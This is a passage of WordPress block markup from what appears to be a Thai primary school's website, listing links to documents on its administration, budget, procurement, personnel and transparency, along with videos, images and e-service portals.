data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> </a><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">- คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 